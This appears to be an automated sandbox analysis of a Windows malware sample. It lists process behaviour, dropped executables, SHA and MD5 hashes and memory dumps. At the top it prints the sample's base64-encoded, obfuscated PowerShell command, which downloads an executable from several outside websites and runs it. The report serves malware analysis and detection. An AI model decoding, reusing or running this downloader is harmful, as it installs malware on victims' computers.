JwArACcAWwAnACkAKwAoACcAXQAnACsAJwB3AHcAJwArACcAdwB3AC4AJwArACcAYQBwAGUAZAAnACkAKwAoACcAdQAnACsAJwB0AGkALgAnACsAJwBjAG8AbQAuAGIAcgAnACkAKwAoACcAXQBbACcAKwAnACAAMQAnACkAKwAoACgAJwApACAAagBqAGsAZwBTACAAWwBdACAAWwAnACsAJwBdACcAKwAnAHcAJwApACkAKwAnAHcAJwArACgAJwBwAC0AaQBuACcAKwAnAGMAJwApACsAJwBsACcAKwAoACcAdQBkAGUAJwArACcAcwBdAFsAJwApACsAKAAoACcAIAAxACkAIABqACcAKwAnAGoAawBnAFMAIAAnACsAJwBbACcAKwAnAF0AIAAnACkAKQArACcAWwAnACsAKAAoACcAXQB3AFgATgAyAHcAJwArACcAZwAnACsAJwAyADYAJwArACcAdgBdAFsAJwArACcAIAAxACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAJwApACkAKwAoACcAIABbAF0AIABbACcAKwAnAF0AdwAnACsAJwBAACcAKwAnAGgAdAAnACkAKwAoACgAJwB0ACcAKwAnAHAAOgAnACsAJwBdAFsAIAAxACkAIABqACcAKwAnAGoAJwApACkAKwAoACcAawAnACsAJwBnAFMAJwApACsAKAAnACAAWwAnACsAJwBdACAAJwApACsAJwBbAF0AJwArACgAKAAnAHcAXQBbACAAMQAnACsAJwApACcAKwAnACAAagBqACcAKwAnAGsAZwBTACcAKwAnACAAWwAnACkAKQArACgAJwBdACAAWwAnACsAJwBdAHcAJwApACsAKAAnAGgAJwArACcAZQBhAG4AawBhAG4ALgAnACsAJwBiAGkAbwBdAFsAJwApACsAKAAoACcAIAAnACsAJwAxACkAIABqAGoAJwArACcAawBnACcAKQApACsAKAAnAFMAIAAnACsAJwBbAF0AIABbAF0AdwAnACkAKwAnAGoAcwAnACsAKAAnAF0AJwArACcAWwAgADEAJwApACsAKAAoACcAKQAgACcAKwAnAGoAagBrACcAKQApACsAKAAnAGcAUwAgACcAKwAnAFsAXQAnACsAJwAgAFsAXQB3ACcAKQArACgAJwBSAGIAXQBbACcAKwAnACAAJwArACcAMQAnACkAKwAoACgAJwApACcAKwAnACAAagAnACkAKQArACcAagAnA
CsAKAAnAGsAZwBTACAAWwBdACAAJwArACcAWwBdACcAKwAnAHcAJwApACsAKAAnAEAAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAF0AWwAnACkAKwAnACAAJwArACgAKAAnADEAJwArACcAKQAgAGoAagBrAGcAJwArACcAUwAnACkAKQArACgAJwAgAFsAJwArACcAXQAgAFsAXQAnACsAJwB3ACcAKQArACgAKAAnAF0AWwAgADEAKQAgAGoAJwArACcAagBrACcAKwAnAGcAUwAgACcAKQApACsAKAAnAFsAXQAnACsAJwAgAFsAXQB3AHMAJwArACcAaABlACcAKwAnAGUAbgAnACsAJwAtAHYAaQBlAHQAbgBhAG0AJwArACcALgAnACsAJwB2AG4AJwApACsAKAAnAF0AWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAgACcAKQApACsAKAAnAGoAagAnACsAJwBrACcAKQArACgAJwBnAFMAJwArACcAIABbAF0AJwApACsAKAAnACAAWwBdAHcAJwArACcAdwBwAC0AJwApACsAKAAnAGMAJwArACcAbwBuAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAF0AWwAnACkAKwAnACAAJwArACgAKAAnADEAKQAnACsAJwAgAGoAagBrAGcAUwAnACkAKQArACcAIABbACcAKwAnAF0AIAAnACsAKAAnAFsAXQAnACsAJwB3AHEAdABnADIAJwArACcASgA2AFgAaAAnACkAKwAoACcAWgBdACcAKwAnAFsAIAAnACkAKwAnADEAJwArACgAKAAnACkAIABqAGoAawAnACsAJwBnAFMAIAAnACkAKQArACgAJwBbACcAKwAnAF0AIABbACcAKwAnAF0AdwBAAGgAdAB0AHAAcwAnACsAJwA6ACcAKQArACgAKAAnAF0AWwAgADEAJwArACcAKQAgAGoAagAnACkAKQArACgAJwBrAGcAJwArACcAUwAnACkAKwAoACgAJwAgAFsAXQAgAFsAJwArACcAXQAnACsAJwB3AF0AWwAgADEAKQAgAGoAagBrACcAKwAnAGcAJwApACkAKwAoACcAUwAgAFsAXQAnACsAJwAgAFsAXQB3AG0AJwArACcAYQBkACcAKQArACgAJwByAHUAJwArACcAcwAnACsAJwBoAGQAaQBnACcAKQArACgAJwBpACcAKwAnAHQAYQBsACcAKQArACgAJwAuAGMAJwArACcAbwBtAF0AJwApACsAKAAoACcAWwAgADEAKQAnACsAJwAgACcAKwAnAGoAagAnACkAKQArACgAJwBrAGcAUwAgAFsAJwArACcAXQAgAFsAXQB3AHcAJwArACcAcAAnACsAJwAtAGEAZABtAGkAbgAnACkAKwAoACgAJwBdAFsAIAAxACkAIABqACcAKwAnAGoAawAnACsAJwBnACcAKQApACsAJwBTACcAKwAnACAAJwArACgAJwBbAF0AJwArACcAIAAnACkAKwAnAFsAJwArACgAJwBdAHcAUAAnACsAJwBKACcAKQArACcAaQBdACcAKwAoACcAWwAgACcAKwAnADEAJwApACsAKAAoACcAKQAgAGoAJwArACcAagAnACkAKQArACcAawBnACcAKwAnAFMAIAAnACsAKAAnAFsAXQAnACsAJwAgACcAKQArACcAWwAnACsAKAAoACcAXQB3AEAAaAB0AHQAJwArACcAcABzADoAXQBbACAAJwArACcAMQApACAAagBqAGsAZwBTACAAWwBdACcAKwAnACAAJwArACcAWwBdAHcAJwArACcAXQBbACAAMQApACcAKQApACsAKAAnACAAagBqACcAKwAnAGsAJwApACsAKAAnAGcAUwAnACsAJwAgAFsAXQAnACkAKwAoACcAIABbAF0AdwAnACsAJwBsACcAKQArACcAdQAnACsAKAAnA
G4AYQAnACsAJwBiAGkAdAB1ACcAKQArACgAJwB5ACcAKwAnAGUAbABpAGsALgAnACsAJwBjAG8AbQBdACcAKQArACcAWwAnACsAJwAgACcAKwAnADEAJwArACgAKAAnACkAIAAnACkAKQArACcAagAnACsAKAAnAGoAJwArACcAawBnAFMAIAAnACkAKwAnAFsAXQAnACsAJwAgACcAKwAnAFsAXQAnACsAJwB3ACcAKwAnAHcAJwArACgAJwBwAC0AJwArACcAYwBvAG4AdAAnACkAKwAoACgAJwBlACcAKwAnAG4AdABdAFsAIAAxACkAIABqAGoAawAnACsAJwBnAFMAJwApACkAKwAoACcAIABbACcAKwAnAF0AJwApACsAKAAnACAAWwBdAHcAZgAnACsAJwBXACcAKwAnAGQAMABdACcAKwAnAFsAIAAxACcAKQArACcAKQAnACsAJwAgACcAKwAoACcAagBqACcAKwAnAGsAZwBTACcAKwAnACAAJwApACsAKAAnAFsAXQAgACcAKwAnAFsAXQB3ACcAKQApACkALgAiAHIARQBwAEwAYABBAEMARQAiACgAKAAoACgAKAAnAF0AWwAgADEAJwArACcAKQAgAGoAJwArACcAagBrAGcAUwAnACkAKQArACgAJwAgAFsAJwArACcAXQAnACkAKwAnACAAJwArACcAWwAnACsAJwBdAHcAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAHMAUABgAEwAaQBUACIAKAAkAFoANABuAGQAdgBfADUAIAArACAAJABVADgANAB0AHQANwBjACAAKwAgACQATwA3AHMAdgBwAG4AdwApADsAJABVAHUAaAB1AHMAYwBmAD0AKAAoACcAUgAnACsAJwBxAG8AZABmACcAKQArACcAawA0ACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQBpADUAcQBfAGQAbwAgAGkAbgAgACQAUABnAGEAdABoAHIAYQApAHsAdAByAHkAewAkAE4AdQBwAHIAcgBtADgALgAiAEQAbwBgAHcAbgBgAEwAYABPAEEARABmAEkATABlACIAKAAkAE0AaQA1AHEAXwBkAG8ALAAgACQAWQB1AGwAaAB2AHAAZgApADsAJABRAHQAcQB1ADYAaAA1AD0AKAAnAEEAJwArACcAYwAnACsAKAAnAF8AYgAnACsAJwByAHQAcwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABZAHUAbABoAHYAcABmACkALgAiAGwARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAANAAwADYAOAAzACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwAnACsAKAAnAGkAbgAzADIAJwArACcAXwAnACkAKwAoACcAUAByAG8AYwAnACsAJwBlACcAKwAnAHMAJwApACsAJwBzACcAKQApAC4AIgBDAFIARQBhAGAAVABlACIAKAAkAFkAdQBsAGgAdgBwAGYAKQA7ACQAQwBtAG8AdgB3AHkAOAA9ACgAJwBGAHAAJwArACgAJwBlAHcAJwArACcAMQAnACkAKwAnAHcAawAnACkAOwBiAHIAZQBhAGsAOwAkAE4AMAA4ADkAYwB1AHYAPQAoACcARgAnACsAKAAnAHQAcQBjAGUAJwArACcAegAnACkAKwAnAGYAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABXAHQAYgA5AG8AcABhAD0AKAAnAE4AJwArACgAJwA5ACcAKwAnAHgANAAxAHAAbAAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe
Command line: C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\PortableDeviceTypes\rdprefdrvapi.exe (child of Avqv7t89l.exe)
  Command line: "C:\Windows\SysWOW64\PortableDeviceTypes\rdprefdrvapi.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
Downloads

- C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe
  MD5: 611df3b3942df2c4917cbf8210756860
  SHA1: ac262f6a83ced5c48fafb39f552f805d6cf5e0ce
  SHA256: 5143bbf39868ca1629040e5c09391b78c9509d19cd236dfc064d6d929cabe6f7
  SHA512: 6480ca141468f6114aff1b4d39386fbd1ff3a1af839b2bb9734187bdbb3d13f05993ab6a491d98fcd1f5a8c4b18252618e60eb0a63765898f6e97e31752f91f2

- C:\Windows\SysWOW64\PortableDeviceTypes\rdprefdrvapi.exe
  MD5: 611df3b3942df2c4917cbf8210756860
  SHA1: ac262f6a83ced5c48fafb39f552f805d6cf5e0ce
  SHA256: 5143bbf39868ca1629040e5c09391b78c9509d19cd236dfc064d6d929cabe6f7
  SHA512: 6480ca141468f6114aff1b4d39386fbd1ff3a1af839b2bb9734187bdbb3d13f05993ab6a491d98fcd1f5a8c4b18252618e60eb0a63765898f6e97e31752f91f2

- memory/108-1-0x0000000006180000-0x0000000006184000-memory.dmp, Filesize 16KB
- memory/108-2-0x00000000007D1000-0x00000000007D5000-memory.dmp, Filesize 16KB
- memory/108-3-0x00000000007D1000-0x00000000007D5000-memory.dmp, Filesize 16KB
- memory/108-0-0x00000000007D1000-0x00000000007D5000-memory.dmp, Filesize 16KB
- memory/608-5-0x0000000002030000-0x0000000002031000-memory.dmp, Filesize 4KB
- memory/608-8-0x00000000026C0000-0x00000000026C1000-memory.dmp, Filesize 4KB
- memory/608-9-0x000000001C340000-0x000000001C341000-memory.dmp, Filesize 4KB
- memory/608-10-0x000000001C3D0000-0x000000001C3D1000-memory.dmp, Filesize 4KB
- memory/608-7-0x0000000002070000-0x0000000002071000-memory.dmp, Filesize 4KB
- memory/608-6-0x000000001AE70000-0x000000001AE71000-memory.dmp, Filesize 4KB
- memory/608-4-0x000007FEF4E70000-0x000007FEF585C000-memory.dmp, Filesize 9.9MB
- memory/856-11-0x0000000000000000-mapping.dmp
- memory/1168-16-0x0000000000000000-mapping.dmp
- memory/1168-18-0x00000000003A0000-0x00000000003E3000-memory.dmp, Filesize 268KB
- memory/1168-19-0x0000000000570000-0x00000000005B2000-memory.dmp, Filesize 264KB
- memory/1724-13-0x0000000002280000-0x00000000022C3000-memory.dmp, Filesize 268KB
- memory/1724-14-0x00000000022D0000-0x0000000002312000-memory.dmp, Filesize 264KB